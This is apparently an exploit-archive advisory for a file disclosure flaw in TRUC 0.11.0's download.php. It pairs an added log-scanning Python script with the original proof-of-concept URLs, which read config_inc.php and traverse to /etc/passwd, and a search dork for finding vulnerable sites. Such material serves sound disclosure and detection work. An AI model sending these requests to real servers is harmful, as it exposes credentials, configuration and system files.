vendor: TRUC
by: TRYAGI
CVSS: 7.5 HIGH
Remote File Disclosure
CWE: 200
Product Name: TRUC
Affected Version From: 0.11.0
Affected Version To: 0.11.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:asdis:truc:0.11.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability

TRUC 0.11.0 is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains the filename of the file to be disclosed in the 'upload_filename' parameter. An attacker can use this vulnerability to disclose sensitive information such as configuration files, source code, etc.

Mitigation:

Upgrade to the latest version of TRUC 0.11.0 or later.
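
Until the upgrade is in place, web server access logs can be checked for the request shapes described above. The following detection sketch is an added example, not code from TRUC or from the original advisory. It goes slightly beyond the two requests shown on this page by also decoding repeated percent-encoding. The log lines are constructed samples, and treating any `.php` filename as suspicious is an assumption about what legitimate downloads look like.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding such as %252e%252e."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(filename):
    """Return the reasons an upload_filename value looks like file disclosure."""
    name = decode_fully(filename).replace("\\", "/")
    reasons = []
    if ".." in name.split("/"):
        reasons.append("traversal")
    if name.startswith("/") or re.match(r"^[A-Za-z]:/", name):
        reasons.append("absolute-path")
    # Assumption: legitimate downloads are never PHP scripts.
    if name.lower().rstrip(". ").endswith(".php"):
        reasons.append("script-source")
    return reasons

def scan(lines):
    """Yield (line_number, filename, reasons) for suspicious download.php requests."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/download.php"):
            continue
        for value in parse_qs(url.query).get("upload_filename", []):
            reasons = classify(value)
            if reasons:
                yield number, decode_fully(value), reasons

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Feb/2008:10:00:01 +0000] "GET /download.php?upload_filename=report.pdf HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Feb/2008:10:00:07 +0000] "GET /download.php?upload_filename=config_inc.php HTTP/1.1" 200 812',
    '203.0.113.9 - - [16/Feb/2008:10:00:09 +0000] "GET /truc/download.php?upload_filename=../../../../../../../../etc/passwd HTTP/1.1" 200 1543',
    '203.0.113.9 - - [16/Feb/2008:10:00:12 +0000] "GET /download.php?upload_filename=%252e%252e%252fconfig_inc.php HTTP/1.1" 200 812',
    '198.51.100.2 - - [16/Feb/2008:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response with a body size that matches a known file, as in the constructed lines above, is the signal that a flagged request actually returned content and warrants credential rotation for anything stored in the disclosed file.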
Source

Exploit-DB raw data:

### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI  ;)  -- Tryag.cc/cc

# milw0rm.com [2008-02-16]